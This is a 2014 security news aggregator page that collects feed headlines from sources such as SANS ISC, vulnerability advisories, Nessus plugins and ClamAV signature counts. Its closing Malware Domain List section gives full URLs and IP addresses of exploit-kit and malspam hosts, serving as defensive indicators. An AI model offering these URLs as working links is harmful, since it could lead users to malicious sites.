PLABS
softwareguideswar roomaboutgo-home
Internet Storm Center Infocon Status
VMware security advisory: VMSA-2014-0010 http://www.vmware.com/security/advisories/VMSA-2014-0010.html, (Wed, Oct 1st)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

ISC StormCast for Wednesday, October 1st 2014 http://isc.sans.edu/podcastdetail.html?id=4171, (Wed, Oct 1st)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

DerbyCon highlights, (Tue, Sep 30th)
I had the pleasure of attending DerbyCon 4.0 (Family Rootz) this past Friday and Saturday and can tell you that if you haven't already attended yourself, pla…

ISC threat level returned to green - ShellShock message traffic subsiding, recommend focus on patching and monitoring, (Tue, Sep 30th)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

ISC StormCast for Tuesday, September 30th 2014 http://isc.sans.edu/podcastdetail.html?id=4169, (Tue, Sep 30th)
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Apple Released Update to Fix Shellshock Vulnerability http://support.apple.com/kb/DL1769, (Mon, Sep 29th)
--- Johannes B. Ullrich, Ph.D. STI|Twitter|LinkedIn (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 U…

Packet Storm
Latest Security Tool Files
Tor-ramdisk i686 UClibc-based Linux Distribution x86 20140925
Tor-ramdisk is an i686 uClibc-based micro Linux distribution whose only purpose is to host a Tor server in an environment that maximizes security and privacy. Tor is a network…

Hakabana 0.2.1
Hakabana is an open source monitoring tool that helps you visualize network traffic using Haka and Kibana.

TOR Virtual Network Tunneling Tool 0.2.4.24
Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new comm…

IPTables Bash Completion 1.3
iptables-bash_completion provides programmable completion for the iptables and ip6tables programs from netfilter.org. Following the logic of iptables, options are shown only i…

IPSet List 3.2.1
ipset_list is a wrapper script for listing sets of the netfilter ipset program. It allows you to match and display sets, headers, and elements in various ways. Optionally, the…

I2P 0.9.15
I2P is an anonymizing network, offering a simple layer that identity-sensitive applications can use to securely communicate. All data is wrapped with several layers of encrypt…

Suricata IDPE 2.0.4
Suricata is a network intrusion detection and prevention engine developed by the Open Information Security Foundation and its supporting vendors. The engine is multi-threaded…

Lynis Auditing Tool 1.6.2
Lynis is an auditing tool for Unix (specialists). It scans the system and available software to detect security issues. Beside security related information it will also scan f…

Secure rm 1.2.14
Secure rm (srm) is a command-line compatible rm(1) which completely destroys file contents before unlinking. The goal is to provide drop in security for users who wish to prev…


SecurityFocus
General Security Vulnerabilities
Vuln: Adobe Flash Player and AIR CVE-2014-0556 Unspecified Heap Based Buffer Overflow Vulnerability
Adobe Flash Player and AIR CVE-2014-0556 Unspecified Heap Based Buffer Overflow Vulnerability…

Vuln: HP MPIO DSM Manager CVE-2014-2639 Local Privilege Escalation Vulnerability
HP MPIO DSM Manager CVE-2014-2639 Local Privilege Escalation Vulnerability…

Vuln: libvirt XML External Entity CVE-2014-5177 Multiple Information Disclosure Vulnerabilities
libvirt XML External Entity CVE-2014-5177 Multiple Information Disclosure Vulnerabilities…

Vuln: libvirt XML Entity Expansion CVE-2014-0179 Information Disclosure Vulnerability
libvirt XML Entity Expansion CVE-2014-0179 Information Disclosure Vulnerability…

Bugtraq: Reflected Cross-Site Scripting (XSS) in Textpattern
Reflected Cross-Site Scripting (XSS) in Textpattern…

Bugtraq: Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin
Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin…

Bugtraq: [security bulletin] HPSBHF03119 rev.1 - HP DreamColor Display running Bash Shell, Remote Code Execution
[security bulletin] HPSBHF03119 rev.1 - HP DreamColor Display running Bash Shell, Remote Code Execution…


Helpful Stuff
DShield.org Recommended Block List
This list summarized the top 20 attacking class C (/24) subnets over the last three days. The number of 'attacks' indicates the number of targets reporting scans from this subnet.
DShield.org Suspicious Domain List
GRC ShieldsUP!
Internet Vulnerability Profiling
Geo IP Location Service
This Geo Ip Location service (IP Address Map lookup service) is provided for FREE by Geobytes, Inc. to assist you in locating the geographical location of an IP Address.
IANA Port Number List
The port numbers are divided into three ranges: the Well Known Ports, the Registered Ports, and the Dynamic and/or Private Ports.
InterNIC Whois Search
A query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system.
Nessus
Latest Nessus Plugins Released
FortiOS < 4.3.16 / 5.x < 5.0.8 Multiple Vulnerabilities (FG-IR-14-006)
Synopsis : The remote host is affected by multiple vulnerabilities. Description : The remote host is runnin…

Cisco Unified Communications Manager 'CTIManager' Vulnerability
Synopsis : The remote host is affected by an arbitrary command execution vulnerability. Description : The r…

GNU Bash Environment Variable Handling Code Injection via ProFTPD (Shellshock)
Synopsis : The remote FTP server is affected by a remote code execution vulnerability. Description : The re…

Squid 3.x < 3.3.13 / 3.4.7 Request Processing DoS
Synopsis : The remote proxy server is affected by a denial of service vulnerability. Description : Accordin…

Cisco IOS Software Network Address Translation (NAT) ALG Module DoS (cisco-sa-20140924-nat)
Synopsis : The remote device is missing a vendor-supplied security patch. Description : According to its se…

Sourcefire
Vulnerability Research Team
Shellshock - Update Bash Immediately!
Shellshock is a serious vulnerability. Bash, arguably the most widely distributed shell on Linux systems, fail…

Looking Glasses with Bacon
This is my first post on the VRT blog and I would like to introduce myself. I am Mariano Graziano, an Italian…

Microsoft Update Tuesday September 2014: another generally light month but with a significant IE bulletin
This month’s Microsoft Update Tuesday is pretty light save for the Internet Explorer bulletin. While there…

Malware Using the Registry to Store a Zeus Configuration File
This blog was co-authored by Andrea Allievi. A few weeks ago I came across a sample that was reading from…

Discovering Dynamically Loaded API in Visual Basic Binaries
Performing analysis on a Visual Basic (VB) script, or when Visual Basic is paired with the .NET Framework, bec…

RHEL
Red Hat Errata
RHBA-2014:1324-1: openstack-packstack and openstack-puppet-modules bug fix advisory
Red Hat Enterprise Linux: Updated openstack-packstack and openstack-puppet-modules packages for Packstack whi…

RHBA-2014:1325-1: Red Hat Enterprise Linux OpenStack Platform Bug Fix and Enhancement Advisory
Red Hat Enterprise Linux: Updated packages for Red Hat Enterprise Linux OpenStack Platform 5.0 (Icehouse) for…

RHBA-2014:1328-1: libcgroup bug fix update
Red Hat Enterprise Linux: Updated libcgroup packages that fix one bug are now available for Red Hat Enterpris…

RHBA-2014:1329-1: Red Hat OpenShift Enterprise 2.1 libcgroup bug fix update
Red Hat Enterprise Linux: Updated libcgroup packages are now available for Red Hat OpenShift Enterprise 2.1.

RHBA-2014:1330-1: Red Hat OpenShift Enterprise 2.0 libcgroup bug fix update
Red Hat Enterprise Linux: Updated libcgroup packages are now available for Red Hat OpenShift Enterprise 2.0.

RHBA-2014:1331-1: Red Hat OpenShift Enterprise 1.2 libcgroup bug fix update
Red Hat Enterprise Linux: Updated libcgroup packages are now available for Red Hat OpenShift Enterprise 1.2.

Microsoft
Security Advisories
2755801 - Update for Vulnerabilities in Adobe Flash Player in Internet Explorer - Version: 29.0
Revision Note: V29.0 (September 23, 2014): Added the 2999249 update to the Current Update section.Summary: Mic…

2871997 - Update to Improve Credentials Protection and Management - Version: 3.0
Revision Note: V3.0 (September 9, 2014): Rereleased advisory to announce the release of update 2982378 to prov…

2905247 - Insecure ASP.NET Site Configuration Could Allow Elevation of Privilege - Version: 2.0
Revision Note: V2.0 (September 9, 2014): Advisory rereleased to announce the offering of the security update v…

2915720 - Changes in Windows Authenticode Signature Verification - Version: 1.4
Revision Note: V1.4 (July 29, 2014): Revised advisory to announce that Microsoft no longer plans to enforce th…

2982792 - Improperly Issued Digital Certificates Could Allow Spoofing - Version: 2.0
Revision Note: V2.0 (July 17, 2014): Advisory revised to announce the availability of update 2982792 for suppo…

Cisco
Security Advisories
OSPF LSA Manipulation Vulnerability in Multiple Cisco Products
Multiple Cisco products are affected by a vulnerability involving the Open Shortest Path First (OSPF) Routing…

GNU Bash Environment Variable Command Injection Vulnerability
On September 24, 2014, a vulnerability in the Bash shell was publicly announced. The vulnerability is related…

Apache Struts 2 Command Execution Vulnerability in Multiple Cisco Products
Multiple Cisco products include an implementation of the Apache Struts 2 component that is affected by a remot…

Cisco IOS Software RSVP Vulnerability
A vulnerability in the implementation of the Resource Reservation Protocol (RSVP) in Cisco IOS Software and Ci…

Cisco IOS Software DHCP Version 6 Denial of Service Vulnerability
A vulnerability in the DHCP version 6 (DHCPv6) server implementation of Cisco IOS Software and Cisco IOS XE So…

Cisco IOS Software Network Address Translation Denial of Service Vulnerability
A vulnerability in the Network Address Translation (NAT) feature of Cisco IOS Software could allow an unauthen…

Multiple Vulnerabilities in Cisco IOS Software Multicast Domain Name System
The Cisco IOS Software implementation of the multicast Domain Name System (mDNS) feature contains the followin…

ClamAV
Top 10 ClamAV Official Signatures
Suspect.DoubleExtension-zippwd-15
Count: 18895…
W32.Virut.Gen.D-163
Count: 12179…
Heuristics.Safebrowsing.Suspected-malware_safebrowsing.clamav.net
Count: 7110…
Heuristics.Phishing.Email.SpoofedDomain
Count: 6804…
Heuristics.Phishing.Email.SSL-Spoof
Count: 5072…
Heuristics.Safebrowsing.Suspected-phishing_safebrowsing.clamav.net
Count: 4508…
Worm.Mydoom.I
Count: 4167…
PUA.Script.PDF.EmbeddedJS-1
Count: 3669…
HTML.Phishing.Card-52
Count: 3614…
Malware Domain List
aveconomic.trailswest.org:15106 (2014/10/01_09:30)
Host: aveconomic.trailswest.org:15106/haddan_files/stories.php, IP address: 87.118.127.230, ASN: 31103, Country: DE, Description: exploit kit…

avecat.missouritheatre.org:15106 (2014/10/01_09:30)
Host: avecat.missouritheatre.org:15106/full/cnstats/clients/stories.php?wink=322, IP address: 87.118.127.230, ASN: 31103, Country: DE, Description: exploit kit…

radiology.starlightcapitaladvisors.net (2014/10/01_09:34)
Host: radiology.starlightcapitaladvisors.net/dr/southeast/steve/dropdown.js, IP address: 85.10.229.207, ASN: 24940, Country: DE, Description: obfuscated script leads to exploit kit…

qwe.affairedhonneur.us (2014/09/17_10:11)
Host: qwe.affairedhonneur.us/depqfie59y, IP address: 192.99.197.131, ASN: 16276, Country: CA, Description: exploit kit…

asd.vicentelopez.us (2014/09/17_10:11)
Host: asd.vicentelopez.us/vbign3s2pe, IP address: 192.99.197.133, ASN: 16276, Country: CA, Description: exploit kit…

borneo.aqq79.com (2014/09/17_10:11)
Host: borneo.aqq79.com/wbxx3.html, IP address: 217.23.5.88, ASN: 49981, Country: NL, Description: frame leads to exploit kit…

optilogus.com (2014/09/16_09:59)
Host: optilogus.com/twmfizdfmu/lteqwxftti.html, IP address: 192.185.17.123, ASN: 20013, Country: US, Description: Compromised site (Sage malspam campaign), leads to Upatre…

flashsavant.com (2014/09/16_09:59)
Host: flashsavant.com/cqavunntfg/kuldytebws.html, IP address: 74.91.152.2, ASN: 32392, Country: US, Description: Compromised site (Sage malspam campaign), leads to Upatre…

becomedebtfree.com.au (2014/09/16_09:59)
Host: becomedebtfree.com.au/ttlnlmwbox/ctinpfgeob.html, IP address: 198.57.194.65, ASN: 46606, Country: US, Description: Compromised site (Sage malspam campaign), leads to Upatre…


© 2014 Procyon Labs / Randal T. Rioux